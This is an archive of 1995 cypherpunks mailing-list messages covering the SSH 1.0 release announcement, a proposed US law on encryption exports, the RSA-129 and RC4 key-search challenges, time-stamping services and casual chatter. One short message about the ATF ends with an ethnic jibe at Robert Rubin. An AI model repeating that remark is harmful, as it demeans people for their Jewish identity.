From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Wed, 12 Jul 95 07:52:34 PDT
To: cypherpunks@toad.com
Subject: ANNOUNCEMENT: Ssh (Secure Shell) remote login program
Message-ID: <199507121451.RAA06122@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Looking for a secure rlogin?
Want to deter IP-spoofing, DNS-spoofing, and routing-spoofing?
Want to run X11 connections and TCP/IP ports securely over an insecure network?
Worried about your privacy?
Then read this.


Introducing SSH (Secure Shell) Version 1.0


Ssh (Secure Shell) is a program to log into another computer over a
network, to execute commands in a remote machine, and to move files
from one machine to another.  It provides strong authentication and
secure communications over insecure channels.  Its features include
the following:

   o    Strong authentication.  Closes several security holes (e.g., IP,
	routing, and DNS spoofing and listening for passwords from the
	network).  New authentication methods: .rhosts together with
	RSA based host authentication, and pure RSA authentication.

   o    All communications are automatically and transparently
        encrypted.  Encryption is also used to protect against spoofed
        packets.

   o    X11 connection forwarding provides secure X11 sessions.

   o    Arbitrary TCP/IP ports can be redirected over the encrypted
        channel in both directions.

   o    Client RSA-authenticates the server machine in the beginning of
        every connection to prevent trojan horses (by routing or DNS
        spoofing) and man-in-the-middle attacks, and the server RSA-
        authenticates the client machine before accepting .rhosts or
        /etc/hosts.equiv authentication (to prevent DNS, routing, or IP
        spoofing).

   o    An authentication agent, running in the user's local workstation
        or laptop, can be used to hold the user's RSA authentication
        keys.

   o    Multiple convenience features fix annoying problems with rlogin
        and rsh.

   o    Complete replacement for rlogin, rsh, and rcp.


Ssh is freely available, and may be used by anyone (see the file
COPYING in the distribution for more details).  There is no warranty
of any kind, and patents may restrict your right to use this software
in some countries.

Ssh is currently available for anonymous ftp at the following locations
   ftp.funet.fi:/pub/unix/security/ssh-1.0.0.tar.gz
   ftp.cs.hut.fi:/pub/ssh/ssh-1.0.0.tar.gz

Please let me know if you willing to have your site act as a
distribution site.  (US sites warning: although this software was
developed outside the United States using information available in any
major bookstore or scientific library worldwide, it is illegal to
export anything containing cryptographic software from the United
States.  Putting this openly available for ftp in the US may make you
eligible for charges on ITAR violations, with penalties up to 10 years
in prison.  French and Russian sites warning: it may be illegal to use
or even posses this software in your country, because your government
wants to be able to monitor all conversations of its citizens.)

There is a WWW home page for ssh: http://www.cs.hut.fi/ssh.

There is a mailing list for ssh.  Send mail to ssh-request@clinet.fi
to get instructions (or mail directly to majordomo@clinet.fi with
"subscribe ssh" in body).


All official distributions of ssh are accompanied by a pgp signature
by the key "pub  1024/DCB9AE01 1995/04/24 Ssh distribution key
<ylo@cs.hut.fi>".  (Included below.)

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.i

mQCNAi+btRkAAAEEAKxQ9HwqfsQc9apOIQmFTo2wqbCL6Q1xlvN6CjxkBbtviaLq
EgmVPnb/FGD5wwxDMjCCJDwBFfLLRwASQAyyy5RjukkZx1Gn8qHzmoyIOVTFOIJI
TFDWyVjMSSvUKACDqXv/xVFunsPlPc7d6f4MwxD1kw2BBpoV7k64di/cua4BAAUR
tCRTc2ggZGlzdHJpYnV0aW9uIGtleSA8eWxvQGNzLmh1dC5maT6JAJUCBRAvm7Vv
qRnF8ZYfSjUBAW7pBACQ7G2pYStkBM5aOK2udb/m/YAAZ/NlY2emSgEJfYrAysSY
0yfbhKGt0K59fGSotmSRcMOpq0tgTMm7lQjsUr5ez1Ra/0Dv7e3xoGQYJ8764X9w
popC+u9JuxLeGTtgWYwPUZIHFcQanZslUmCDr36kvesx/2wXBf8+StghMbA3vw==
=aGik
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

iQCVAgUBMAPhQqkZxfGWH0o1AQHgngP/dbcRUFqJF549VvVOWgDtAxu/UoO6hnei
26/OpczgH6j8+6fZh8TV81yVAh95K6EhHsKo85j5hXTmKSG3xLn6fw26q1DPGHpQ
Sa4xQ4oL20qcvgOeaEi3gZxxTD5etzdl8eBNbe8vSIkk91yrsAiZL7h8St7UHGsA
N5WqXSMI8pg=
=tXr9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 12 Jul 95 15:06:59 PDT
To: unicorn@access.digex.net
Subject: Re: NSA, Random Number Generation, Soviet Codes, Prohibition of Crypto
In-Reply-To: <199507122014.NAA19181@comsec.com>
Message-ID: <9507122202.AA13704@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


If I remember correctly from "Spycatcher", the Soviets misused the one time
pad allowing the Verona breaks, by using it twice, not by making slightly
weak rannos.

Of course, in this business, anything you read/hear could be a cover
story.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Wed, 12 Jul 95 15:21:13 PDT
To: bdolan@use.usit.net
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.SOL.3.91.950712171632.1850A-100000@use.usit.net>
Message-ID: <9507122221.AA24506@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Wed, 12 Jul 1995 15:28:25 -0400
   Subject: Anti-Electronic Racketeering Act of 1995

   On June 27, Sen. Grassley introduced extensive criminal amendments to the
   federal racketeering act.  S. 974, the "Anti-Electronic Racketeering Act of
   1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute),
   18 USC 1030A (new section on computer crime), 18 USC 2515, 2516
   (wiretapping), and 42 USC 2000aa (Privacy Protection Act).

   This proposed legislation is Very Bad. It would make all encryption
   software posted to computer networks that are accessible to foreigners
   illegal *regardless of whether the NSA has classified the software as a
   munition!!!*  Here's the language:

    "Sec. 1030A.  Racketeering-related crimes involving computers
      "(a) It shall be unlawful--

   . . .

	 "(2) to distribute computer software that encodes or encrypts
       electronic or digital communications to computer networks that the
       person distributing knows, or reasonably should know, is accessible to
       foreign nationals and foreign governments, regardless of whether such
       software has been designated nonexportable."

It's much worse than this.  Look at the definition of "predicate act":

            `(b) For purposes of this section, each act of distributing
          software is considered a separate predicate act. Each instance in
          which nonexportable software is accessed by a foreign government, 
          an agent of a foreign government, a foreign national, or an agent 
          of a foreign national, shall be considered as a separate predicate
          act.

Now, since the bill also makes 1030A violations "racketeering
activities", all you need are two predicate acts and RICO comes into
play.  

Finally, we begin to see the attack on all forms of un-escrowed
encryption.  The bill provides an affirmable defense of
giving the keys to the government ahead of time!

            `(c) It shall be an affirmative defense to prosecution under this
          section that the software at issue used a universal decoding device
          or program that was provided to the Department of Justice prior to
          the distribution.'.

There are also some nice surprises related to wiretapping evidence
(would allow the gov't. to use the fruits of an illegal wiretap
conducted by a third party if the government didn't know about the
wiretap) and the Privacy Protection Act.

Get a copy of this bill from:

		ftp://ftp.loc.gov/pub/thomas/c104/s974.is.FTP

and read it.  

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 12 Jul 95 15:20:52 PDT
To: Al Thompson <alt@iquest.net>
Subject: Re: RACIST MILITIA: ATF
In-Reply-To: <m0sVs4F-000BYfC@dorite1.iquest.net>
Message-ID: <Pine.3.89.9507121842.A22054-0100000@larry>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone got the address of the Southern Poverty Law Center? Wonder if 
they will go apeshit putting out press releases against the racist 
activities happening during the watch of TReasury Secretary Robert Rubin, 
a Nice Liberal Jewish Boy.....

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Wed, 12 Jul 95 10:04:21 PDT
To: cypherpunks@toad.com
Subject: Re: Why they can be sued... (Was: freedom of speech)
Message-ID: <v01510103ac2888fb20cd@[193.74.217.8]>
MIME-Version: 1.0
Content-Type: text/plain



>
>Last thursday there was a report in the news. They started a new
>lawsuit against a Nazi, who was already earlier sentenced for other
>Nazi crimes. He was sued because he distributed a video. In the video

Just to sidetrack the issue, a bit.  Are there any ex-Nazis who participated
in the Holocaust who would dispute this guy?

>
>I wanted to know in detail why he can be sued. Therefore I had a look
>into my book commenting the criminal law. I try to translate as good
>as I can.
>
>In the german criminal law there is a chapter about slander, libel and
>such things.
>
>Slander is seen in Germany not as a crime, but as an offence.  It
>differs from other offences in the detail, that the prosecuting attorney
>can't sue it himself. It needs the request of a 'victim'.
>
>If the victim dies, the right to request is transferred to the
>wife/husband and the children. If there aren't any, to the parents. If
>there aren't any, to the brothes/sisters and grandchildren.
>
>  Par. 189: Wer das Andenken eines Verstorbenen verunglimpft,
>  wird mit Freiheitsstrafe bis zu zwei Jahren oder mit
>  Geldstrafe bestraft.
>
>  Who decries the memory to a dead person, is punished with jail up
>  to two years or fine.
>

This is a little different from the US. I've never heard of anybody being
jailed or fined for libel/slander, just sued for it.

>
>This applies under certain circumstances to saying that the holocaust
>never happened.
>
>Do you have a law like this in America?
>
>

No. You can't libel the dead.  Most historians would get their socks sued
off if you could.  I remember reading about a case once in which two sons
wanted to sue the man who had libelled their dead father.  They couldnt do
it through normal channels, father being dead and all, so they publicly
called the libeller a liar, repeatedly, eventually provoking _him_ to sue
_them_ thereby allowing the truth of the original liber to be tested in
court.  The sons won; a moral victory at least.

>
>This is the reason why someone can be sued if he claims that the
>holocaust never happened. It is not the idea itself. The reason is
>that it can be a form of violence against dead people in the eyes of
>german law.
>

So in other words, the Holocaust-Denial crime is a creative extension of
existing libel laws.

>BTW: I have a collection of the most important german laws on my
>webserver. You can find the list at
>
>http://iaks-www.ira.uka.de/ta/Diverses/Gesetze/
>

Useful to know that.  Aachen is just down the road from here.



--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 12 Jul 95 16:23:57 PDT
To: cypherpunks@toad.com
Subject: Re: RACIST MILITIA: ATF
Message-ID: <199507122323.TAA19392@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by alanh@infi.net (Alan Horowitz) on Wed, 12 
Jul  6:21 PM



For those in time-zones west of NYC, NBC Lightly News covers 
the ATF happy campers, and interviews the majordomo, who 
solemnly meins that he will investigate and do what's right.


Another NBC LN item: DOJ is to "re-open" the look at the Ruby 
Ridge carnage.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 12 Jul 95 16:33:37 PDT
To: jim@acm.org
Subject: Re: Capt. Midnight decoder badges
Message-ID: <9507122330.AA18388@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


 25 13 23   20 26 2   17 13   16 11 12 18   9 12 16 11 13 23 16
 7 2 13 9 12 2 5   16 11 4   7 4 25.    11 13 9   15 13 2 5   17 13 4 18
 12 16   16 26 7 4? 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Wed, 12 Jul 95 16:36:54 PDT
To: cypherpunks@toad.com
Subject: the sound of another shoe dropping...
Message-ID: <9507122338.AA06723@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message
Forwarded message:
>From farber@eff.org  Wed Jul 12 16:41:13 1995
Posted-Date: Wed, 12 Jul 1995 15:28:18 -0400
X-Sender: farber@linc.cis.upenn.edu
Message-Id: <v02110184ac29d2a1b404@[130.91.88.102]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Priority: 1 (Highest)
Date: Wed, 12 Jul 1995 15:28:25 -0400
From: farber@central.cis.upenn.edu (David Farber)
Subject: Anti-Electronic Racketeering Act of 1995
Precedence: list
To: interesting-people@eff.org (interesting-people mailing list)
X-Proccessed-By: mail2list

Date: Wed, 12 Jul 1995 14:00:23 -0400
From: ssteele@eff.org (Shari Steele)

Heavy sigh.
On June 27, Sen. Grassley introduced extensive criminal amendments to the
federal racketeering act.  S. 974, the "Anti-Electronic Racketeering Act of
1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute),
18 USC 1030A (new section on computer crime), 18 USC 2515, 2516
(wiretapping), and 42 USC 2000aa (Privacy Protection Act).

This proposed legislation is Very Bad. It would make all encryption
software posted to computer networks that are accessible to foreigners
illegal *regardless of whether the NSA has classified the software as a
munition!!!*  Here's the language:

 "Sec. 1030A.  Racketeering-related crimes involving computers
   "(a) It shall be unlawful--

. . .

      "(2) to distribute computer software that encodes or encrypts
    electronic or digital communications to computer networks that the
    person distributing knows, or reasonably should know, is accessible to
    foreign nationals and foreign governments, regardless of whether such
    software has been designated nonexportable."

I'm up to my ears in analyses that need to be written, but I'll send around
something more complete when I'm able to pull it together.
Shari




------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anthony@atanda.com (Anthony Templer)
Date: Wed, 12 Jul 95 19:40:05 PDT
To: www-buyinfo@allegra.att.com
Subject: Re: Road trip
Message-ID: <v02120c00ac2a375c10b6@[204.162.11.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:40 PM 7/12/95, Robert Hettinga wrote:
>I'm going to be in San Francisco (Walnut Creek, really) Saturday, Sunday,
>and Monday.
>
>Anyone up for a beer?
>
>Cheers,
>Bob Hettinga

Bob, I've enjoyed your postings and would like to buy you a beer and chat
for a while. I'm in Oakland. There's a great pub (30 taps) right around the
corner from my house. Or do you have a place in mind in Walnut Creek for
the hoisting?

Regards,
Anthony


"We are what we repeatedly do.
 Excellence, then, is not an act,
 but a habit."
                Aristotle






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 16:41:50 PDT
To: Matt Blaze <mab@research.att.com>
Subject: Re: the sound of another shoe dropping...
In-Reply-To: <9507122338.AA06723@merckx.info.att.com>
Message-ID: <9507122341.AA11589@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



> On June 27, Sen. Grassley introduced extensive criminal amendments to the
> federal racketeering act.  S. 974, the "Anti-Electronic Racketeering Act of
> 1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute),
> 18 USC 1030A (new section on computer crime), 18 USC 2515, 2516
> (wiretapping), and 42 USC 2000aa (Privacy Protection Act).

Needless to say, this must be stopped. This time, it can't be handled
via silly petitions.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher.Baker@f14.n374.z1.fidonet.org (Christopher Baker)
Date: Thu, 13 Jul 95 00:23:32 PDT
To: cypherpunks@toad.com
Subject: Re: Dr. Seuss, Technical Writer
Message-ID: <92e_9507121909@borderlin.quake.com>
MIME-Version: 1.0
Content-Type: text/plain



In a message dated: 11 Jul 95, you stated:

>               What If Dr. Seuss Did Technical Writing?
>
> Here's an easy game to play.
> Here's an easy thing to say:

what if there was a complete version of this rhyme?

--- Following message extracted from REC.ORG.MENSA @ 1:374/14 ---
    By Christopher Baker on Thu Dec 15 11:27:49 1994

From: Mike Steiner
To: All
Date: 15 Dec 94  02:40:52
Subj: Bits in a Box
From: steiner@best.com (Mike Steiner)
Organization: Society for the Preservation of Endangered Societies

            A Grandchild's Guide to Using Grandpa's Computer
 
 
                     Bits   Bytes   Chips   Clocks
                     Bits in bytes on chips in box.
                 Bytes with bits and chips with clocks.
                      Chips in box on ether-docks.
 
             Chips with bits come.  Chips with bytes come.
               Chips with bits and bytes and clocks come.
 
               Look, sir. Look, sir. Read the book, sir.
               Let's do tricks with bits and bytes, sir.
              Let's do tricks with chips and clocks, sir.
 
               First, I'll make a quick trick bit stack.
                Then I'll make a quick trick byte stack.
                 You can make a quick trick chip stack.
                You can make a quick trick clock stack.
 
                  And here's a new trick on the scene.
                    Bits in bytes for your machine.
                  Bytes in words to fill your screen.
 
                  Now we come to ticks and tocks, sir.
                   Try to say this by the clock, sir.
 
                         Clocks on chips tick.
                         Clocks on chips tock.
                         Eight byte bits tick.
                         Eight bit bytes tock.
               Clocks on chips with eight bit bytes tick.
              Chips with clocks and eight byte bits tock.
 
                      Here's an easy game to play.
                    Here's an easy thing to say....
 
            If a packet hits a pocket on a socket on a port,
            and the bus is interupted as a very last resort,
       and the address of the memory makes your floppy disk abort
         then the socket packet pocket has an error to report!
 
          If your cursor finds a menu item followed by a dash,
      and the double-clicking icon puts your window in the trash,
       and your data is corrupted cause the index doesn't hash,
     then your situation's hopeless, and your system's gonna crash!
 
                 You can't say this? What a shame, sir!
                   We'll find you another game, sir.
 
          If the label on the cable on the table at your house
       says the network is connected to the button on your mouse,
          but your packets want to tunnel on another protocol,
        that's repeatedly rejected by the printer down the hall,
     and your screen is all distorted by the side-effects of gauss,
         so your icons in the window are as wavy as a souse,
          then you may as well reboot and go out with a bang,
          cause as sure as I'm a poet, the sucker's gonna hang!
 
       When the copy of your floppy's getting sloppy on the disk,
         and the microcode instructions cause unnecessary risc,
  then you have to flash your memory and you'll want to RAM your ROM.
      Quickly turn off your computer and be sure to tell your mom!
 
              (God bless you Dr. Seuss wherever you are!)
 
+----------------------------------------------------------------------+

  Origin: COBRUS - Usenet-to-Fidonet Distribution System (1:2613/335.0)

 -30-

TTFN.
Chris
--
| Fidonet:  Christopher Baker 1:374/14
| Internet: Christopher.Baker@f14.n374.z1.fidonet.org
| via Borderline! uucp<->Fido{ftn}gate Project +1-818-893-1899





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 12 Jul 95 16:53:01 PDT
To: rross@sci.dixie.edu (Russell Ross)
Subject: Re: RSA129 Project
In-Reply-To: <v01520d00ac2a09c57dc2@[144.38.16.209]>
Message-ID: <199507122352.TAA04306@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


If you look at ftp://toxicwaste.mit.edu/pub/rsa129 you will find a lot
of documentation on the RSA-129 project, including the call-to-arms,
program distributions, papers, etc.

I wouldn't call this the canonical site, but I tried to make available
most everything that I could find on the project while it was running
and afterwards.

Enjoy!

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Wed, 12 Jul 95 16:14:04 PDT
To: perry@imsi.com
Subject: Re: ANNOUNCEMENT: Ssh (Secure Shell) remote login program
In-Reply-To: <9507122105.AA11297@snark.imsi.com>
Message-ID: <m0sWBfu-0009ydC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Stephen D. Williams writes:
> > It occurred to me that it wouldn't be too tough to have one CFSD
> > open a TCP/socket connection to another CFSD and pass file access
> > requests instead of implementing them locally.  The encryption
> > of the ssh link and the on disk encryption of CFSD should be a 
> > good combination.
> 
> The whole point of CFS was that you could mount remote devices that
> were encrypted and decrypt them locally. CFS acts like a scrim over
> existing file systems. If the remote machine has your keys on it
> you've reduced security and, seemingly to me, gained very little.
> 
> Now, what *would* be really neat would be an implementation of CFS in
> kernel under 4.4lite using the stacked vnode architecture. It would
> probably be fairly simple to do it, and you wouldn't have any context
> switches or the like when cfs'ing...
> 
> Perry

That's true.  I was thinking in terms of traversing firewalls in a
safe fashion rather than where normal SUN/RPC NFS is available.

For this, using CFS and SSH together seems appropriate.

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Wed, 12 Jul 95 18:16:24 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: RSA129 Project
In-Reply-To: <199507130006.RAA22366@mycroft.rand.org>
Message-ID: <Pine.ULT.3.91.950712201521.9580A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


Speaking of RSA129, we were talking on mn.general about how interesting 
it would be to try another distributed RSA attack at a larger key (the 
number of 512-bits was thrown around).  Are there currently any plans to 
attempt another one of these?  I'd love to get our MasPAR cracking on 
something.

____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 12 Jul 95 17:40:12 PDT
To: www-buyinfo@allegra.att.com
Subject: Road trip
Message-ID: <v02120d00ac2a18ee888c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm going to be in San Francisco (Walnut Creek, really) Saturday, Sunday,
and Monday.

Anyone up for a beer?

Cheers,
Bob Hettinga

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMARo7vgyLN8bw6ZVAQF6ygP/fDnuvdAhGlDWsSMXUIRMuNHYzdZ00cqk
Db/Tc2+DuhuEa6GU03AgZY8K9t5r9iua34E68pCxogUz009b1OcjNt6+o+704Z3j
1YY9ijYM8BWNaSp9L2W4nUuWBdIyIWyol/2PjjRVNZEtqtSRQnPEpJ2IHtz9iGov
Hf0SqhSZKZs=
=+Q3I
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Wed, 12 Jul 95 19:53:26 PDT
To: cypherpunks@toad.com
Subject: RC4
Message-ID: <199507130301.VAA18401@zeezrom.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


I was trying to throw a few already wasted CPU cycles to the RC4 bit,
but had some problems getting the cypher and plain files. (I can't "save
next link", only "save current" which sometimes doesn't work well.)

So anyway, I decide to run a 24 bit test run on what I've got, using the
"extra allocated" keyspace. It says got it at c70014639. Since I know I'm
not lucky enough to pick the 5 seconds worth of CPU time that would work,
I think someone better send me (by email thanks, lets not clutter the
list) the uue of the cypher and plain. I ran the dos version, BTW, but I'm
going to compile under Linux. 

When we decide _which_ key we're going to crack, I could finagle basically
full cpu time on about 10 hp9000's for 6 hours a day. Would that help? ;)

Don



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merzbow@ibm.net  (Dan Bailey)
Date: Wed, 12 Jul 95 18:29:49 PDT
To: cypherpunks@toad.com
Subject: UNWANTED KEYSPACE
Message-ID: <199507130129.AA44622@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


I allocated way too many keys by getting interrupted (my ISP crashed)
then pressing the wrong submit button.  Here they are:
cd70000000 31
cdf0000000 31
ce70000000 31
cef0000000 31
cf70000000 31
cff0000000 31
d070000000 31
d0f0000000 31
d170000000 31
d1f0000000 31
d270000000 31
d2f0000000 31
d370000000 31
d3f0000000 31
d470000000 31
d4f0000000 31
d570000000 31
d5f0000000 31
d670000000 31
d6f0000000 31
d770000000 31
d7f0000000 31
d870000000 31
d8f0000000 31
d970000000 31
d9f0000000 31
da70000000 31
daf0000000 31
db70000000 31
dbf0000000 31
dc70000000 31
dcf0000000 31






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Wed, 12 Jul 95 21:54:16 PDT
To: Bryce Wilcox <cypherpunks@toad.com
Subject: Surety Digital Notary Service
Message-ID: <ac29f4de07021004e15a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(There was no message name on this message, so I've created one.)

At 4:14 AM 7/13/95, Bryce Wilcox wrote:
>I am searching for a time-stamping service that will sign some data of mine
>(or a hash thereof) along with a certificate indicating what time(,date,year)
>the signing occurred.  I want to use this to substantiate my claim that I
>was in possession of this data before others were.  (Useful for copyrights/
>patents, and possibly other things.)

Digital time-stamping is a recurring theme on this list. Info can be found
in the Cypherpunks archives, in my Cyphernomicon FAQ, and, most easily, by
contacting Surety at:

http://www.surety.com/


--Tim May




..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Wed, 12 Jul 95 21:14:37 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199507130414.WAA15848@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



There was some discussion on c-punks a little while back about exchanging
DigiCash cyberbucks for other currencies (namely US$, as I recall).  Is
there a list or Web page where I can participate in such a market?  Thanks.


Bryce
signatures follow

        /================---------------
 Bryce Wilcox                   "Pretty Good Privacy" encrypted mail preferred
 bryce.wilcox@colorado.edu                               finger for public key
                                     ---------------================/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMASWRJCUT4gUihHlAQGSUgP/WvL/OSzFl8l6PH60D1IK9gT/OAhNc9tm
1jOyKx1shbq0DNUG9uGlJksz/a7gBD20Li6t/7pQkxQbAqIY9vTPiyu3ectRD7c7
9Yqh+jQRXR3+vyE7duD0z1BLs8kSmzmP6/LX5UYx4uJwKT9q+TnOP1S7Nh5PQh0m
BB1CRr5I54M=
=dLV7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Wed, 12 Jul 95 21:14:38 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199507130414.WAA15851@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

 

I am searching for a time-stamping service that will sign some data of mine
(or a hash thereof) along with a certificate indicating what time(,date,year)
the signing occurred.  I want to use this to substantiate my claim that I
was in possession of this data before others were.  (Useful for copyrights/
patents, and possibly other things.)


(Of course, I could just encrypt the data, PGP-authentify it with my
private key, and post it to UseNet, but this strikes me as inefficient and
impolite.)


If anyone knows where I can find such a service please post here or 
e-mail me.  Thanks.


Bryce
signatures follow

        /================---------------
 Bryce Wilcox                   "Pretty Good Privacy" encrypted mail preferred
 bryce.wilcox@colorado.edu                               finger for public key
                                     ---------------================/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMASWV5CUT4gUihHlAQFckgP8CJJrkY4hTJ1u8uOHZ2N5QfGzYWelv9n7
zXS5bcTxqT8RvHLV8Q+Ay2fbwMrtJmlnF1qWZvDACIUH6M+gYo92vtvaYeVrwv1m
pOu8Ci70dGErhHINNSXeZK6QbgIp/Rh9DyubwaMFjnNO9fRhUF3X45qidnwp3x/C
+zKOoDh0liM=
=lmh8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Wed, 12 Jul 95 12:16:58 PDT
To: sdw@lig.net
Subject: Re: ANNOUNCEMENT: Ssh (Secure Shell) remote login program
In-Reply-To: <m0sW5hj-0009ydC@sdwsys>
Message-ID: <199507121916.WAA06662@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> ssh, while an obvious name, already collides with a nice shar decoder and
> a different kind of secure shell from CFS.

Ssh has already been registered with IANA (Internet Assigned Numbers
Authority) as the name of the service.  I would rather not change it
without a compelling reason.  It is also easy to obtain from rsh by
replacing the r by s (which also makes for scp, sshd, and in future
maybe also sdist).  It is my understanding that CFS is in rather
limited use (especially outside the US), and the ssh shar extractor is
not widely used either (neither can be found from the archie database
at archie.funet.fi).  IETF has a thing called Site Security Handbook
that they abbreviate SSH, but it is probably sufficiently different
not to be confused.

> Of course support for S/Key and tokens/hand held authenticators would be
> useful additions for some situations (although inferior to RSA...).

True.

The agent protocol can currently be used to forward a connection to
any program (which can mean device) that can perform RSA
authentication.  New authentication methods can be compatibly added
later.

S/Key can be used by making skeysh you login shell.  Then you will
first be asked for a normal password (if any), and then for the
one-time password.  I did not want to incorporate skey functionality
directly into the software, because it is not clear to me if the
arrangements in use (file names, formats, algorithms) have stabilized
yet.  Also, there is less need for skey as no passwords are
transmitted in the clear.

> Integration with TCP/NFS and/or client-server CFS would be fantastic.
> (One local CFS server acting as a secure client over tcp to a remote
> CFS server.)
> Remote encrypted mount of an encrypted partition...

